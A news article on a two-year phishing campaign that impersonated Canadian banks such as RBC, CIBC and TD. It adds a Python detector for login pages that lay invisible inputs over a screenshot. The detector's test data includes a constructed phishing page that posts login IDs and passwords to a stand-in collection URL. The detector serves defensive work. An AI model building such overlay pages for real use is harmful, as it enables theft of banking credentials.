Some of Canada’s biggest banks have been hit by a two-year phishing campaign which saw fraudsters impersonating them to harvest customers’ online banking logins.
A cybersecurity research team at Check Point found look-alike domains carrying the names of 14 banks, including the Canadian Imperial Bank of Commerce (CIBC), Toronto-Dominion (TD) Canada Trust and Scotiabank, being used to steer legitimate customers to phishing pages that asked for their online banking credentials.
Pivoting from a single URL linked to a Ukrainian IP address, Check Point found a whole host of URLs impersonating Canadian banks linked to the same address, and from there further IP addresses in the same netblock, revealing a “massive infrastructure” of fake but convincing-looking sites.
Most recently the Royal Bank of Canada (RBC), which has 16 million customers and is the largest bank in Canada by market capitalisation, fell victim to the impersonators.
The email sent to RBC customers carried a PDF bearing the bank’s logo that asked them to renew their RBC Express “digital certificate”. It supplied an “authorisation code” and told customers to use it once they followed the phishing link. The linked page asked customers to enter their login ID and password.
Check Point found that the impersonators had used a screenshot of RBC’s official website as the page background and layered invisible text boxes over the spots where the login fields appear in the image.
When the customer attempts to sign in, their credentials are presumably captured by the impersonators, and they are redirected to a “registration” page asking for the authorisation code from the phishing email. They are then told to wait while a fake digital certificate is generated.
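The screenshot-plus-invisible-inputs construction described above leaves a recognisable footprint in the page markup: a full-size image (or body background image) positioned as a backdrop, and absolutely positioned text and password inputs styled so they cannot be seen. The script below is an added example of a triage heuristic for that pattern; it is not Check Point’s tooling or anything from the campaign, and both sample pages are constructed for the example. It only inspects inline `style` attributes, so a page that moves the same rules into a stylesheet or sets them from script would need the rendered DOM rather than raw HTML.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a page built the way the article describes: a screenshot of
# the real login page as a full-size backdrop, with invisible inputs placed over the
# spots where the username and password fields appear in the picture. The file name,
# coordinates and the example.invalid collection URL are assumptions, not real artefacts.
PHISH_PAGE = """
<html><body style="margin:0">
<img src="bank_login_screenshot.png" style="position:absolute;top:0;left:0;width:1280px">
<form action="https://example.invalid/collect" method="post">
<input type="text" name="loginid"
       style="position:absolute;top:312px;left:480px;width:220px;opacity:0;border:none;background:transparent">
<input type="password" name="password"
       style="position:absolute;top:356px;left:480px;width:220px;opacity:0;border:none;background:transparent">
<input type="submit" value="" style="position:absolute;top:400px;left:480px;width:90px;height:30px;opacity:0">
</form></body></html>
"""

# A normal login form for comparison (also constructed): visible inputs in normal flow.
NORMAL_PAGE = """
<html><body><img src="logo.png" style="width:120px">
<form action="/login" method="post">
<label>Client card</label><input type="text" name="card">
<label>Password</label><input type="password" name="pw">
<input type="submit" value="Sign in">
</form></body></html>
"""


def _norm(style):
    """Lower-case and strip whitespace so 'opacity: 0' and 'opacity:0' compare equal."""
    return re.sub(r"\s+", "", style.lower())


class _Collector(HTMLParser):
    """Collects the inline styles of <body>, every <img> and every <input>."""

    def __init__(self):
        super().__init__()
        self.body_style = ""
        self.images = []   # inline style of each <img>
        self.inputs = []   # (type, inline style) of each <input>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        style = _norm(a.get("style", ""))
        if tag == "body":
            self.body_style = style
        elif tag == "img":
            self.images.append(style)
        elif tag == "input":
            self.inputs.append((a.get("type", "text").lower(), style))


# opacity:0 or opacity:0.0 as a complete declaration (not opacity:0.9)
_FULLY_TRANSPARENT = re.compile(r"(^|;)opacity:0(\.0+)?(;|$)")
_NO_BORDER = re.compile(r"(^|;)border:(none|0)(px)?(;|$)")


def _is_ghost_input(style):
    """Absolutely/fixed positioned input that is transparent or borderless on a clear background."""
    if "position:absolute" not in style and "position:fixed" not in style:
        return False
    if _FULLY_TRANSPARENT.search(style):
        return True
    clear_bg = "background:transparent" in style or "background-color:transparent" in style
    return clear_bg and _NO_BORDER.search(style) is not None


def _has_backdrop(c):
    """A body background image or an absolutely positioned <img> can serve as the screenshot layer."""
    if "background" in c.body_style and "url(" in c.body_style:
        return True
    return any("position:absolute" in s or "position:fixed" in s for s in c.images)


def scan_login_page(html):
    """Return a dict of indicators; 'suspicious' is true when a backdrop and ghost inputs coexist."""
    c = _Collector()
    c.feed(html)
    credential_types = ("text", "password", "email", "tel")
    ghosts = [t for t, s in c.inputs if t in credential_types and _is_ghost_input(s)]
    backdrop = _has_backdrop(c)
    return {
        "backdrop": backdrop,
        "ghost_inputs": len(ghosts),
        "ghost_password": "password" in ghosts,
        "suspicious": backdrop and len(ghosts) >= 1,
    }


if __name__ == "__main__":
    for name, page in (("phish", PHISH_PAGE), ("normal", NORMAL_PAGE)):
        print(name, scan_login_page(page))
```

Run on the two samples, the overlay page reports a backdrop and two ghost credential inputs (the invisible submit button is deliberately not counted, since a hidden submit is common on legitimate pages), while the normal form reports neither. The heuristic is a triage signal for a URL-scanning or mail-sandbox pipeline, not a verdict on its own: a page that passes it clean may still be phishing, and a page that trips it should be confirmed by comparing its form action against the bank’s real domain.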
The realisation that these impersonators had been operating for two years came when Check Point cross-referenced the PDF attachment used to spoof RBC with those from earlier phishing scams against other banks. It found continuity in the phrasing used across the PDF attachments, and that in some cases the PDFs were password-protected so that security scanners could not inspect their contents.
Check Point confirms that it has now “successfully intercepted these described attacks and was able to block all of the malicious attachments involved in this campaign”.